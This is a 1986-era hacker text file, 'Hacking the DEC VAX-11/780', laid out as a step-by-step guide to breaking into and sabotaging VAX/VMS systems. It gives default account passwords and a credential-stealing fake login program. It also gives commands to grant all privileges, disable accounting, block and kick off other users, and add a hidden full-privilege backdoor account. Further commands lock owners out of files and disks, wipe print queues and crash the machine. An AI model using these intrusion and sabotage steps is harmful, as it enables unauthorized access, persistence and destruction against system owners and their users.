Hacking the DEC VAX-11/780 For Phun and Profit By..... The Nuclear Wastoid So, you say you want to learn how to hack the VAX-11/780. This phile contains all you need to know to wreak massive havok and have major fun. This phile is devided into five sections, which are: 1. Getting On 2. Staying On 3. Basics 4. Having Fun 5. Shutting Down and Getting Off. Each is pretty much self- explanatory, so here goes: PART I. Getting On. There are 2 techniques to getting on the system: Hit and Miss, or random passwords, and Cheating. We will, of course, deal with cheating. To cheat yourself onto the system, you can either: 1. use someone else's password, of 2. use a default password. 1. Using Someone Else's Password Using someone else's password can be both good and bad. It's good because you don't have to create a new account or use a restricted one, so the sysop won't see anything out of the ordinary. It's bad because the person may notice that someone else has been on the system with his pass when he wasn't on the system. It's also not very good because the person may not have high enough privelege for your needs. To get someone's password is simple if you can get onto the system, even with limited access. Just log onto the sysop's (or someone else with high enough privelege) and write a program that just sits there and looks like the logon prompt. Have the program output the names+ passes it gets to a remote printer or a file that you can get to later, and then kill itself. 2. Defaults. There are four default accounts placed on the VAX when it is first set up. These can be changed or deleted, but usually one or two survive. The defaults are: Name Password --------------------------------------------------- SYSTEM MANAGER or OPERATOR FIELD SERVICE or TEST DEFAULT USER or DEFAULT SYSTEST UETP or SYSTEST I have found that FIELD SERVICE works most often. Once you're on the system, you want to make yourself able to do the most damage. to do his, type: $ SET PROC/PRIV=ALL -'$' is the system prompt If the system responds with some bullshit about your privelege not being high enough, GET ANOTHER PASSWORD. You need full access to have enough phun. PART II. Staying On. Okay, you're on the system. Now what? Mass destruction, of course. But first, make sure you'll be able to get back on. The first thing you want to do is: Š$ SET ACCOUNTING/DISABLE This stops the system from keeping track of you. Now type: $ SHOW USERS to see who is on the system. If you see your account listed twice, log off. You don't want to be caught because of something stupid like that. If you want to make sure that nobody can interfere with your phun, you should type: $ SET LOGINS/INTERACTIVE=0 This keeps anybody else to log onto the computer. Now to kick everybody else off: $ SHOW USERS - the system responds with something like: VAX/VMS INTERACTIVE USERS 23-JUL-1986 09:37:15.54 Total number of interactive users= 6 Username Process Name PID Terminal BRUNO BRUNO 0000026B TTD3: FIELD FIELD 00000FF2 TTC2: JOHNSON _TTD5: 0000026D TTD5: LINCOLN LINCOLN 0000026A TTD2: CYBERPUNK CYBERPUNK 000001D8 TTD4: HARDCORE HARDCORE 00000263 TTC0: Now, if you logged on as FIELD, you want to go through and type: $ STOP/ID=PID - substituting the number in the PID column for PID for each person other than you. This kicks everybody else off the system. It's best if you only do this at night or when usage is low, because if the sysop gets lots of complaints he might catch you. The next thing you want to do is make sure that you will be able to get back onto the system next time. To do this, type: $ SET DEF SYS$SYSROOT:[SYSEXE] This takes you to the SYSEXE directory of the SYS$SYSROOT drive. Now type: $ RUN AUTHORIZE - the system will respond: UAF> - now type: UAF> ADD WASTOID /PASSWORD=ZEDNET /UIC=[099,900] /CPUTIME=0- /DEVICE=SYS$SYSROOT /DIRECTORY=[SYSEXE] /PRIVS=ALL /NOACCOUNTING UAF> EXIT Now- what does this mean? ADD WASTOID - adds new record with name=WASTOID /PASSWORD=ZEDNET - sets password for new acount /UIC=[099,900] - sets user identification code for new account /CPUTIME=0 - tells system you can use it anytime the '-' after /CPUTIME=0 tells the computer that you're starting a new line. /DEVICE=SYS$SYSROOT - sets your home drive /DIRECTORY=[SYSEXE] - sets your home directory /PRIVS=ALL - give yourself full access /NOACCOUNTING - so the system can't keep track of you Okay. Now you'll be able to get back on. On to ... PART III. System Basics Here are some commands you need to know if you haven't ever used a Vax: Š HELP - this brings up a list of all commands, and will explain any of them for you. SET DEF drive:[directory.sub1.sub2] - sets default drive and directory. TYPE or T - types a file to the screen. In the format : T FILENAME.EXT PRINT or PR - prints a file to the printer. In the format : PR FILENAME.EXT DIR or D - directory D- shows name,size,protection DIR/PRINT or D/PRINT outputs the directory to printer+ screen. RUN or R - executes .EXE files R FILENAME.EXE @ - executes .COM files @FILENAME.COM Okay, now you're ready for: PART IV: Having Fun. A. Files It has got to be the greatest feeling in the world to lock somebody out of his own files. This is hilarious to do, especially if you can watch the person when he finds out. To do this, you use the SET PROTECTION command. Let's say that you want to lock everybody but yourself out of a file called TEST.FIL. You would type: $ SET PROT=(S:RWED,O,G,W) TEST.DAT This gives you (the system) full rights, while everybody else (owner, group, and world) has no access rights. B. Disks The next most fun thing to do is to lock everybody off of whole disks at a time. To do this to drive DMA1:, you type: $ DISMOUNT DMA1: - take DMA1: out of service $ DEALLOCATE DMA1: - take DMA1: off line $ SET PROT=(S,O:R,G,W)/DEVICE/OWNER_UIC[099,900] DMA1: - this tells the system that DMA1: is a private drive of yours. $ ALLOCATE DMA1: - bring DMA1: back on line $ MOUNT DMA1: - put DMA1: back in service. SHAZAM!! your own personal drive that nobody else can use. C. Printers Say you want to print a file called HACKING.DAT. You type : $ PR HACKING.DAT and the system responds that your file is 'pending' on LPA0:. this means that some asshole just put a 1000 page file into the print queue, so your little file won't print until next tuesday. What you do is: $ STOP/ABORT LPA0: This makes the printer stop its current job and kick it off the queue. Now: $ DELETE/QUEUE LPA0: This kills everything that was on the queue. Wow! A whole printer to yourself! Anyway, now I'll leave you alone. I'm sure you can find more ways of having fun on your own, so I'll leave them to you. Oh, by the way- Šdon't skip .... PART V: Shutting Down and Getting Off Now say that the system is going to explode in 30 seconds if it's not shut down. Well, being the good samaritan that you are, you'll just have to shut it down for them. There are two quick- and- dirty ways that DEC provided for just such an occasion. #1 works, but #2 is faster and looks nicer. 1. OPCCRASH. To shut down the system with the OPCCRASH command, simply $ RUN SYS$SYSTEM:OPCCRASH - the system will respond: SYSTEM SHUTDOWN COMPLETE- USE CONSOLE TO HALT SYSTEM now type: ^P - the system will respond: >>> - type: >>> HALT - the system will respond: HALTED AT 8000708A - or whatever 2. CRASH system command To shut down the systrem with the CRASH command, simply type: ^P >>> HALT >>> @CRASH - this executes the system command CRASH and displays a big error listing. Neat, eh? Now you can do everything, except log off, so here goes: $ LO WASTOID logged out at 23-JUL-1986 10:27:13.20 $